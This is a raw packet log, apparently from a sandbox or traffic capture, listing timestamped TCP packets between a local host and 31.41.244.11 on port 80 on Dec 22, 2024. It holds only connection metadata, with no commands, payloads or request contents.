Dec 22, 2024 02:16:31.011919022 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011924028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.012031078 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.012646914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.012681007 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.012684107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.012720108 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.012721062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.012757063 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.012763023 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.012793064 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.012797117 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.012836933 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.013398886 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.013434887 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.013442039 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.013474941 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.013489962 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.013525963 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.013530016 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.013562918 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.013566971 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.013598919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.013602972 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.013641119 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.014261961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.014303923 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.014322996 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.014359951 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.014394999 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.014403105 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.014431000 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.014465094 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.014476061 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.014509916 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.015206099 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.015242100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.015265942 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.015276909 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.015285015 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.015319109 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.015330076 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.015366077 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.015377045 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.015408993 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.016064882 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.016100883 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.016124010 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.016138077 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.016143084 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.016175032 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.016184092 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.016208887 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.016220093 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.016247034 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.016273022 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.016285896 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.118853092 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.118906975 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.119071007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.119095087 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.119122982 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.119215012 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.120100975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.120345116 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.120412111 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.120414019 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.120450974 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.121583939 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.121638060 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.121643066 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.121680975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.122488022 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.122543097 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.122580051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.122627974 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.123542070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.123589039 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.123658895 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.123703957 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.124695063 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.124859095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.124912977 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.125771046 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.125963926 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.126013994 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.126888990 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.126940966 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.127007008 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.127991915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.128042936 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.128110886 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.129067898 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.129137993 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.129142046 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.129190922 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.130033970 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.130146980 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.130198956 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.131037951 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.131117105 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.131175041 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.131978035 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.132085085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.132138968 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.132905006 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.133049965 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.133102894 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.133863926 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.133953094 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.134010077 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.134776115 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.134830952 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.134888887 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.135632038 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.135775089 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.135832071 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.136497021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.136581898 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.136640072 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.137370110 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.137485027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.137540102 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.138250113 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.138367891 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.138428926 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.139132023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.139239073 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.139301062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.139967918 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.140151978 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.140217066 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.140847921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.140959024 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.141036987 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.141704082 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.141829014 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.141907930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.142576933 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.142707109 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.142784119 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.143460989 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.143644094 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.143721104 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.144335985 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.144464970 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.144542933 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.145205975 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.145384073 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.145462036 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.146073103 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.146181107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.146258116 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.146944046 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.147063017 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.147140980 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.147840023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.147970915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.148046017 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.148705006 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.148821115 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.148899078 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.149558067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.149686098 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.149764061 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.150471926 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.150574923 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.150654078 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.151350975 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.151449919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.151525021 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.152170897 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.152349949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.152427912 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.153072119 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.153202057 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.153278112 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.153944016 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.154064894 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.154145002 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.154786110 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.154946089 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.155021906 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.155678034 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.155798912 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.155877113 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.156552076 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.156670094 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.156745911 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.157429934 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.157546043 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.157623053 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.158283949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.158395052 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.158469915 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.159198999 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.159449100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.159528971 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.160053968 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.160270929 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.160351038 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.160921097 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.161034107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.161111116 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.161803007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.161938906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.162017107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.162667036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.162796021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.162870884 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.163552046 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.163672924 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.163752079 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.164407969 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.164534092 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.164617062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.165281057 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.165394068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.165472031 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.166142941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.166277885 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.166359901 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.166968107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.168313026 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.311213017 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.311259031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.311295986 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.311364889 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.311506987 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.311532021 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.311687946 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.311734915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.311810970 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.312483072 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.312602997 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.312686920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.313338041 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.313443899 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.313524008 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.314169884 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.314305067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.314385891 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.315007925 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.315150023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.315244913 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.315850019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.315982103 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.316057920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.316714048 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.316811085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.316890001 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.317563057 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.317692995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.317764044 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.318413019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.318542004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.318619967 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.319262028 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.319459915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.319539070 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.320111036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.320249081 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.320328951 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.320996046 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.321222067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.321300030 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.321811914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.321955919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.322035074 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.322645903 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.322772980 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.322849035 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.323502064 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.323627949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.323704958 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.324359894 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.324476957 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.324556112 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.325189114 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.325335026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.325412035 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.326040030 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.326181889 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.326308966 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.326883078 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.327023029 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.327105999 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.327725887 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.327867985 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.327939987 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.328571081 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.328715086 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.328792095 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.329423904 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.329550028 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.329624891 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.330286026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.330419064 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.330499887 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.331180096 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.331280947 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.331377029 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.331988096 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.332107067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.332185984 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.332859039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.332978964 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.333056927 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.333694935 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.333926916 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.334003925 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.334563971 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.334713936 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.334793091 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.335422039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.335563898 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.335639954 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.336220026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.336322069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.336399078 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.337085962 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.337265015 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.337342978 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.337944031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.338068962 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.338148117 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.338789940 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.338910103 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.338985920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.339627981 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.339761972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.339833975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.340461016 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.340604067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.340676069 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.341356039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.341455936 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.341548920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.342147112 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.342298031 CET	80	49804	31.41.244.11	192.168.2.4
